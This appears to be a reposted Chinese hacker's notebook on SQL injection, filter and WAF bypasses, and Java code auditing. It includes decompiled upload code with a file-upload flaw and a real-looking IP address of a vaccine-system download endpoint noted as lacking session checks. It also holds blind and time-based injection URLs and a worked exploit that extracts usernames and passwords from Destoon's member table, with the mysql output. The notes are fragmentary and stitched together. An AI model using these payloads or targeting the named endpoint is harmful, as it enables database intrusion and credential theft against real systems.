本文共 10485 字，大约阅读时间需要 34 分钟。

mysql注入:     \ 反斜杠的奥秘     slecet from ,char,取代where 关键字绕过的奥秘     多次过滤的奥秘:2,3次注入;update更新管理员 jsp图片马:     在F盘百度网盘有下载     桌面也有文件夹有      Java && .Net代码审计知识回顾:     http://www.wooyun.org/bugs/wooyun-2014-053099 302跳转的大问题;小贺那个jsp并没有泄漏这些信息.          http://58.214.247.138:8888/vacc/document/downdoc.do?docu_id=2     downloaddocument没有SESSION          http://www.wooyun.org/bugs/wooyun-2010-061078     ' or[字段名字]<db_name()-- //关键字的绕过          【.NET小科普之一】数据库信息在哪儿     http://drops.wooyun.org/tips/975     http://blog.163.com/hero_213/blog/static/3989121420085267561179/     mapping.findForward->struts-config获取标签fail.           HttpSession session = request.getSession();       String userid = (String)session.getAttribute("usersplatformuserid");       String name = new String(request.getParameter("name").getBytes("iso-8859-1"), "gb2312");       if ((name == null) || ("".equals(name))) {         return mapping.findForward("fail");       }          nopted++;文件查找;整个目录查找class xxx     或者:public ServiceResponse     private ServiceResponse     public class ServiceResponse 搜索upload 这是upload的 import com.jwx.jfa.dto.ServiceRequest; import com.jwx.jfa.dto.ServiceResponse; import com.jwx.jfa.dto.ServiceResponse.ServiceCode; import com.jwx.jfa.web.BaseAction; import com.jwx.nipm.vaccine.dto.DocumentDTO; import com.jwx.nipm.vaccine.util.VaccineIdentity; import java.io.File; import java.io.FileOutputStream; import java.util.Iterator; import java.util.List; import javax.servlet.http.HttpServletRequest; import javax.servlet.http.HttpServletResponse; import javax.servlet.http.HttpSession; import org.apache.commons.fileupload.DiskFileUpload; import org.apache.commons.fileupload.FileItem; import org.apache.struts.action.ActionForm; import org.apache.struts.action.ActionForward; import org.apache.struts.action.ActionMapping; 这是download的 import com.jwx.jfa.dto.ServiceRequest; import com.jwx.jfa.dto.ServiceResponse; import com.jwx.jfa.dto.ServiceResponse.ServiceCode; import com.jwx.jfa.log.JfaLogger; import com.jwx.jfa.web.BaseAction; import com.jwx.nipm.vaccine.dto.DocumentDTO; import com.jwx.nipm.vaccine.util.DateUtil; import com.jwx.nipm.vaccine.util.VaccineIdentity; import java.io.File; import java.io.FileInputStream; import java.util.Map; import javax.servlet.ServletOutputStream; import javax.servlet.http.HttpServletRequest; import javax.servlet.http.HttpServletResponse; import org.apache.commons.logging.Log; import org.apache.struts.action.ActionForm; import org.apache.struts.action.ActionForward; import org.apache.struts.action.ActionMapping; Linux环境upload package com.jwx.nipm.vaccine.web.document; import com.jwx.jfa.dto.ServiceRequest; import com.jwx.jfa.dto.ServiceResponse; import com.jwx.jfa.dto.ServiceResponse.ServiceCode; import com.jwx.jfa.web.BaseAction; import com.jwx.nipm.vaccine.dto.DocumentDTO; import com.jwx.nipm.vaccine.util.VaccineIdentity; import java.io.File; import java.io.FileOutputStream; import java.util.Iterator; import java.util.List; import javax.servlet.http.HttpServletRequest; import javax.servlet.http.HttpServletResponse; import javax.servlet.http.HttpSession; import org.apache.commons.fileupload.DiskFileUpload; import org.apache.commons.fileupload.FileItem; import org.apache.struts.action.ActionForm; import org.apache.struts.action.ActionForward; import org.apache.struts.action.ActionMapping; public class UploadDocumentAction extends BaseAction {   public ActionForward execute(ActionMapping mapping, ActionForm form, HttpServletRequest request, HttpServletResponse response)     throws Exception   {     try     {       ServiceRequest serviceRequest = generateRequest(request);       serviceRequest.setIdentity(new VaccineIdentity());       serviceRequest.setRequestedCommandID("documentCommand");       serviceRequest.setParameter("action", "upload"); //action=upload 这样?       HttpSession session = request.getSession();       String userid = (String)session.getAttribute("usersplatformuserid"); //获取session usersplatformuserid的值       String name = new String(request.getParameter("name").getBytes("iso-8859-1"), "gb2312"); //获取name的值       if ((name == null) || ("".equals(name))) {         return mapping.findForward("fail");       }       String fileStore = "document\\";       File store = new File(fileStore);       if (!store.exists()) store.mkdir();       DiskFileUpload fu = new DiskFileUpload();       fu.setSizeThreshold(1073741824);       List fileItems = fu.parseRequest(request); //解析你request过来的值       Iterator it = fileItems.iterator();       String fileName = null;       long fileSize = 0L;       byte[] content = null;       while (it.hasNext()) {         FileItem fi = (FileItem)it.next();         String field;         if (fi.isFormField()) {           field = fi.getFieldName().toUpperCase(); //把你的文件名全部大写         }         else {           fileName = fi.getName(); //获取文件名           fileSize = fi.getSize(); //获取文件大小           if (fileSize > 1048576L)             return mapping.findForward("fail");           content = fi.get();         }       }       if ((fileName == null) || (fileName.trim().equals(""))) throw new Exception("No file be selected!");       fileName = fileName.substring(fileName.lastIndexOf('\\'));       FileOutputStream os = new FileOutputStream(fileStore + File.separator + fileName, false); //File.separator 在 UNIX 系统上，此字段的值为 '/'；在 Microsoft Windows 系统上，它为 '\'。       os.write(content);       os.close();       DocumentDTO document = new DocumentDTO();       document.setDocu_adder(Integer.valueOf(userid));       document.setDocu_title(fileName.substring(fileName.lastIndexOf('\\') + 1));       document.setDocu_size(Integer.toString((int)Math.floor((fileSize + 1023L) / 1024L)));       serviceRequest.setCurrentRequestObject(document);       ServiceResponse serviceResponse = processRequest(serviceRequest);       if (serviceResponse.getServiceCode() == ServiceResponse.ServiceCode.SUCCESS) {         return mapping.findForward("success");       }       return mapping.findForward("fail");     }     catch (Exception e)     {       e.printStackTrace();     }return mapping.findForward("fail");   } } mysql语法:     select-1；     select+1；     select{x 1};     select.`1`.a;     select.``.schema_name from information_schema.schemata;     http://rile.gou.gg/search?query=1%27>(select.``.schema_name from (select.``.schema_name,if(ascii(mid((select * from test.flag),1,1)) =102,(benchmark(5000000,sha(1))),1) from information_schema.schemata)x)%23     http://rile.gou.gg/search?query=1' || if(ascii(substr((/*!select*/ */*a!*/from test.flag),1,1))=97,1,0)%23 http://rile.gou.gg/search?query=1' || if(ascii(substr((/*!select*/ */*a!*/from test.flag),1,1))=97,1,1)%23     select * from corp where corp_id in (1,2,(if(1=1,3,2))) group by concat(version(),floor(rand(0)*2)) having min(0);     于是我们可以使用corp_id=1  and corp_name= 'xxxx'的形式最后获取corp_name的值     按道理类似的使用uname = ‘admin’ and upass = 'xxx'的方式获取pass的值     但是这里得靠字典将pass的字段爆破出来     http://zone.wooyun.org/content/23796         multipart/form-data PHP和Java通用的WAF绕过方法     http://zone.wooyun.org/content/24143     /*select*/SELECT`password`from `destoon_member`     /*select*/SELECT`password`from `destoon_member` GROUP BY userid HAVING userid = 1     GROUP BY + HAVING 是可以帮助我们定位的。 ### 字符猜解的绕过技巧 程序中过滤了很多猜解字符串需要的函数例如:substring/substr/left...但是好像忘记了right和mid？ code 区域 sql = mid( (/*selec*/SELECT`password`from `destoon_member` GROUP BY userid HAVING userid = 1) , 1, 1 ) 找到字符以后，需要对字符串进行转换。这方面，程序对ascii、hex、ord、char进行了过滤，但是CONV呢？ code 区域 CONV(mid( (/*selec*/SELECT`password`from `destoon_member` GROUP BY userid HAVING userid = 1) , 1, 1 ),16,10)=16 技巧一：select.``.password from destoon_member 技巧二：select!1,password from destoon_member mysql> SELECT LPAD(REVERSE(TRIM( lpad('username',3,SPACE(1)) )),1,SPACE(1));     SELECT MID('username',3,1);     +---------------------------------------------------------------+     | LPAD(REVERSE(TRIM( lpad('username',3,SPACE(1)) )),1,SPACE(1)) |     +---------------------------------------------------------------+     | e                                                             |     +---------------------------------------------------------------+     1 row in set          +---------------------+     | MID('username',3,1) |     +---------------------+     | e                   |     +---------------------+     1 row in set          mysql> 拆分字符串之后，我们试着把字符串转为10进制。conv与括号之间加入注释符，依然是可以使用的。 code 区域 mysql> select conv/**/('ad',16,10);     +----------------------+     | conv/**/('ad',16,10) |     +----------------------+     | 173                  |     +----------------------+     1 row in set ## 漏洞利用代码 猜解destoon_member里的username。 code 区域 (/*select*/SELECT!1,conv/**/(LPAD(REVERSE(TRIM( lpad(username,1,SPACE(1)) )),1,SPACE(1)),16,10)/*from*/from `destoon_member` ORDER BY userid limit 1)=(SELECT 0,13) 这个是转换后的代码，依然可以执行： code 区域 (/*selec&#116;*/SELECT!1,conv/**/(LPAD(REVERSE(TRIM( lpad(username,1,SPACE(1)) )),1,SPACE(1)),16,10)/*fro&#109;*/from `destoon_member` ORDER BY userid limit 1)=(SELECT!1,223) 漏洞证明： 我们提交的原语句为 code 区域 (/*select*/SELECT!1,conv/**/(LPAD(REVERSE(TRIM( lpad(username,1,SPACE(1)) )),1,SPACE(1)),16,10)/*from*/from `destoon_member` ORDER BY userid limit 1)=(SELECT!1,223) 过滤后的语句为 code 区域 (/*selec&#116;*/SELECT!1,conv/**/(LPAD(REVERSE(TRIM( lpad(username,1,SPACE(1)) )),1,SPACE(1)),16,10)/*fro&#109;*/from `destoon_member` ORDER BY userid limit 1)=(SELECT!1,223) 以下为测试SQL语句的可执行性 code 区域 mysql> select (/*selec&#116;*/SELECT!1,conv/**/(LPAD(REVERSE(TRIM( lpad(username,1,SPACE(1)) )),1,SPACE(1)),16,10)/*fro&#109;*/from `destoon_member` ORDER BY userid limit 1)=(SELECT!1,223);      +---------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------+     | (/*selec&#116;*/SELECT!1,conv/**/(LPAD(REVERSE(TRIM( lpad(username,1,SPACE(1)) )),1,SPACE(1)),16,10)/*fro&#109;*/from `destoon_member` ORDER BY userid limit 1)=(SELECT!1,223) |      +---------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------+     |                                                                                                                                                                               0 |      +---------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------+     1 row in set          mysql> select (/*selec&#116;*/SELECT!1,conv/**/(LPAD(REVERSE(TRIM( lpad(username,1,SPACE(1)) )),1,SPACE(1)),16,10)/*fro&#109;*/from `destoon_member` ORDER BY userid limit 1)=(SELECT!1,13);      +---------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------+     | (/*selec&#116;*/SELECT!1,conv/**/(LPAD(REVERSE(TRIM( lpad(username,1,SPACE(1)) )),1,SPACE(1)),16,10)/*fro&#109;*/from `destoon_member` ORDER BY userid limit 1)=(SELECT!1,13) |      +---------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------+     |                                                                                                                                                                              1 |      +---------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------+     1 row in set    

转载地址：http://rdmnn.baihongyu.com/